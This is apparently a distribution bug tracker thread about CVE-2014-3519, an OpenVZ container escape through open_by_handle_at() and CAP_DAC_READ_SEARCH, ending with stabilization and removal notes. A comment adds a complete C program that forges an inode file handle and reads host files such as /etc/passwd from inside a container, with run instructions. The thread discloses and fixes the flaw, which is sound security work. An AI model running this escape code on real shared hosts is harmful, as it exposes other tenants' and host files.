An attacker is able to access files outside of his container. The open_by_handle_at() function enables a process to access files on a mounted filesystem using a file_handle structure. This structure uses inode numbers to differentiate files. Calling this function requires the CAP_DAC_READ_SEARCH capability, and the superuser inside a container has this capability by default. This enables an attacker to bypass simfs restrictions and access all files on the underlying filesystem, including those of other VEs residing on the same filesystem. This is the same issue as the one affecting Docker, which was discovered recently by Sebastian Krahmer. He wrote about it on this list: http://www.openwall.com/lists/oss-security/2014/06/18/4 . This vulnerability is identified by CVE-2014-3519. For further technical information please refer to Sebastian Krahmer's post and POC (http://stealth.openwall.net/xSports/shocker.c).
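To make the mechanism in the report concrete, here is an added example (mine, not code from the bug report, from the openvz kernel or from shocker.c) that shows why a raw inode number is enough: it fills in a file_handle by hand and passes it to open_by_handle_at(), with no path lookup and therefore no simfs or chroot boundary involved. Assumptions, all mine: the underlying filesystem is ext2/3/4, whose exportfs handle type 1 (FILEID_INO32_GEN) is an 8-byte {inode, generation} payload in native byte order; ext4 skips the generation check when the generation is 0; and the mount fd only has to be some open fd on the same filesystem, here the current directory. The prctl() check reports the precondition the report names, CAP_DAC_READ_SEARCH in the bounding set; on a system where that capability has been dropped for the container, open_by_handle_at() fails with EPERM.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <linux/capability.h>

/* Handle type 1 (FILEID_INO32_GEN) is the exportfs encoding ext2/3/4 use:
 * an 8-byte payload of {inode number, inode generation}, both native u32.
 * Assumption: the filesystem under the container uses this encoding. */
#define INO32_GEN_HANDLE_TYPE  1
#define INO32_GEN_HANDLE_BYTES 8

/* struct file_handle ends in a zero-length f_handle[]; the union gives it room. */
union ino_handle {
    struct file_handle fh;
    unsigned char raw[sizeof(struct file_handle) + INO32_GEN_HANDLE_BYTES];
};

/* Build a handle that names inode `ino` directly; no path is involved.
 * gen 0 asks ext4 to skip the generation check (assumption: ext4 behaviour). */
void build_ino_handle(union ino_handle *h, uint32_t ino, uint32_t gen)
{
    memset(h, 0, sizeof *h);
    h->fh.handle_bytes = INO32_GEN_HANDLE_BYTES;
    h->fh.handle_type  = INO32_GEN_HANDLE_TYPE;
    memcpy(h->fh.f_handle, &ino, sizeof ino);
    memcpy(h->fh.f_handle + sizeof ino, &gen, sizeof gen);
}

/* Open inode `ino` on the filesystem that `mount_fd` lives on. Any fd on that
 * filesystem will do; the kernel only uses it to find the superblock.
 * Returns an fd >= 0, or -errno (EPERM without CAP_DAC_READ_SEARCH). */
int open_by_inode(int mount_fd, uint32_t ino, uint32_t gen)
{
    union ino_handle h;
    build_ino_handle(&h, ino, gen);
    int fd = open_by_handle_at(mount_fd, &h.fh, O_RDONLY);
    return fd < 0 ? -errno : fd;
}

/* The precondition of the bug: 1 if CAP_DAC_READ_SEARCH is still in this
 * process's capability bounding set, 0 if it was dropped, -errno on error. */
int dac_read_search_in_bounding_set(void)
{
    int r = prctl(PR_CAPBSET_READ, CAP_DAC_READ_SEARCH, 0, 0, 0);
    return r < 0 ? -errno : r;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <inode> [generation]\n", argv[0]);
        return 2;
    }
    uint32_t ino = (uint32_t)strtoul(argv[1], NULL, 0);
    uint32_t gen = argc > 2 ? (uint32_t)strtoul(argv[2], NULL, 0) : 0;

    printf("CAP_DAC_READ_SEARCH in bounding set: %d\n",
           dac_read_search_in_bounding_set());

    int mount_fd = open(".", O_RDONLY | O_DIRECTORY); /* any fd on the target fs */
    if (mount_fd < 0) { perror("open ."); return 1; }

    int fd = open_by_inode(mount_fd, ino, gen);
    if (fd < 0) {
        fprintf(stderr, "open_by_handle_at: %s\n", strerror(-fd));
        return 1;
    }
    char buf[256];
    ssize_t n = read(fd, buf, sizeof buf);
    printf("opened inode %u, first %zd bytes:\n", ino, n);
    if (n > 0) fwrite(buf, 1, (size_t)n, stdout);
    close(fd);
    close(mount_fd);
    return 0;
}
```

Run it as root inside the VE with an inode number from outside (for example the inode of /etc/passwd on the host, obtained with `stat -c %i`): on an unpatched kernel the bytes of the host file come back; once CAP_DAC_READ_SEARCH is removed from the container's bounding set the same call returns EPERM, which is the fix in one line of output.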
Bumped to 2.6.32.90.5. Security, please handle this.
Pva, please stabilize ASAP.
x86/amd64 stable.
This version removed from tree
GLSA Vote: No